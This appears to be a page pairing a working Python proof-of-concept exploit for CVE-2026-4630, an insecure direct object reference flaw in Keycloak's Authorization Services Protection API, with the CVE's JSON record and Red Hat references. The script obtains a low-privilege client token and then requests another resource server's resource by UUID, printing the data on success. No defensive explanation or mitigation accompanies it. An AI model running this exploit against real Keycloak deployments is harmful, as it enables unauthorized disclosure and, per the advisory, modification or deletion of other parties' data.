CVE-2026-4630

import requests # Configuration KEYCLOAK_URL = "https://keycloak.example.com" REALM = "master" CLIENT_ID = "attacker-client" CLIENT_SECRET = "attacker-secret" TARGET_UUID = "b8e08e4e-1e7b-4e3c-9c2f-1d4e5f6a7b8c" # UUID of victim's resource # 1. Authenticate as a low-privilege client to get a token auth_url = f"{KEYCLOAK_URL}/realms/{REALM}/protocol/openid-connect/token" auth_data = { "grant_type": "client_credentials", "client_id": CLIENT_ID, "client_secret": CLIENT_SECRET } auth_resp = requests.post(auth_url, data=auth_data) access_token = auth_resp.json().get("access_token") if access_token: print(f"[+] Authenticated. Token: {access_token[:20]}...") # 2. Exploit IDOR - Access another resource server's resource using the UUID # Endpoint: Authorization Services Protection API target_api_url = f"{KEYCLOAK_URL}/realms/{REALM}/authz/protection/resource_set/{TARGET_UUID}" headers = { "Authorization": f"Bearer {access_token}", "Content-Type": "application/json" } # Attempting GET (Information Disclosure) response = requests.get(target_api_url, headers=headers) if response.status_code == 200: print(f"[+] Exploit Successful! Retrieved resource data:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) else: print("[-] Authentication failed.")

{"cve": {"id": "CVE-2026-4630", "sourceIdentifier": "[email protected]", "published": "2026-05-19T12:16:19.290", "lastModified": "2026-05-20T17:16:27.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource's unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4630", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450245", "source": "[email protected]"}]}}